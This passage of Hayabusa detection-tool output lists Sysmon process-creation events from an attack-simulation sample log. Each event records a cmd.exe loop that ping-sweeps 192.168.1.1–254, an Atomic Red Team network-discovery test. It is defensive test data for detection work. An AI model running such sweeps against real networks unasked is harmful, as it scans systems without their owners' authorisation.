MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D919-5D31-0000-001088E23400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:10.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.71 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1200 | PGUID: 747F3D96-D91A-5D31-0000-001072E53400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:10.522 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.72 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4664 | PGUID: 747F3D96-D91A-5D31-0000-00105CE83400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:11.031 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.73 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2804 | PGUID: 747F3D96-D91B-5D31-0000-001046EB3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:11.504 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.74 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D91B-5D31-0000-00100BF43400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:12.023 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.75 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6080 | PGUID: 747F3D96-D91C-5D31-0000-0010F5F63400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:12.547 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.76 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6308 | PGUID: 747F3D96-D91C-5D31-0000-0010DFF93400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:13.030 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.77 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5692 | PGUID: 
747F3D96-D91D-5D31-0000-0010CAFC3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:13.489 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.78 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4092 | PGUID: 747F3D96-D91D-5D31-0000-0010B7FF3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:14.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.79 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6516 | PGUID: 747F3D96-D91E-5D31-0000-0010A1023500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:14.552 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.80 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1232 | PGUID: 747F3D96-D91E-5D31-0000-00108E053500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:15.051 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.81 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in 
(1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3164 | PGUID: 747F3D96-D91F-5D31-0000-001079083500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:15.548 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.82 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5612 | PGUID: 747F3D96-D91F-5D31-0000-0010640B3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:16.040 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.83 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2288 | PGUID: 747F3D96-D920-5D31-0000-00104E0E3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:16.584 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.84 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1684 | PGUID: 747F3D96-D920-5D31-0000-0010A6183500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:17.041 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.85 | Process: C:\Windows\System32\PING.EXE | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1060 | PGUID: 747F3D96-D921-5D31-0000-0010921B3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:17.511 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.86 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3744 | PGUID: 747F3D96-D921-5D31-0000-00107C1E3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:18.015 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.87 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3068 | PGUID: 747F3D96-D922-5D31-0000-001066213500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:18.509 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.88 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6312 | PGUID: 747F3D96-D922-5D31-0000-001063243500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:18.990 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.89 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3116 | PGUID: 747F3D96-D922-5D31-0000-001053273500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:19.541 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.90 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D923-5D31-0000-00103D2A3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:20.006 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.91 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1020 | PGUID: 747F3D96-D924-5D31-0000-0010272D3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:20.543 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.92 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2292 | PGUID: 
747F3D96-D924-5D31-0000-001024303500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:21.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.93 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D925-5D31-0000-00106C3C3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:21.488 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.94 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5852 | PGUID: 747F3D96-D925-5D31-0000-0010563F3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:22.030 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.95 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6288 | PGUID: 747F3D96-D926-5D31-0000-00101B483500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:22.542 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.96 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in 
(1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D926-5D31-0000-0010074B3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:23.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.97 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D927-5D31-0000-0010F24D3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:23.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.98 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D927-5D31-0000-0010DC503500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:24.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.99 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D928-5D31-0000-0010C7533500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:24.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.100 | Process: C:\Windows\System32\PING.EXE | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D928-5D31-0000-0010B1563500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:25.035 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.101 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7152 | PGUID: 747F3D96-D929-5D31-0000-00109D593500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:25.529 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.102 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D929-5D31-0000-00108A5C3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:26.007 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.103 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6084 | PGUID: 747F3D96-D929-5D31-0000-0010765F3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:26.534 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.104 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3700 | PGUID: 747F3D96-D92A-5D31-0000-001062623500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:27.040 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.105 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2852 | PGUID: 747F3D96-D92B-5D31-0000-0010296B3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:27.493 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.106 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6484 | PGUID: 747F3D96-D92B-5D31-0000-00108D6E3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:28.017 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.107 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5400 | PGUID: 
747F3D96-D92C-5D31-0000-00107A713500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:28.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.108 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3452 | PGUID: 747F3D96-D92C-5D31-0000-001072743500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:29.110 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.109 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4468 | PGUID: 747F3D96-D92D-5D31-0000-001068773500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:29.561 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.110 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4320 | PGUID: 747F3D96-D92D-5D31-0000-0010787A3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:30.054 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.111 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i 
in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3952 | PGUID: 747F3D96-D92E-5D31-0000-0010787D3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:30.526 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.112 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6148 | PGUID: 747F3D96-D92E-5D31-0000-001091803500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:31.015 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.113 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3800 | PGUID: 747F3D96-D92F-5D31-0000-00109C833500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:31.476 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.114 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1324 | PGUID: 747F3D96-D92F-5D31-0000-0010478A3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:32.005 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.115 | Process: C:\Windows\System32\PING.EXE | 
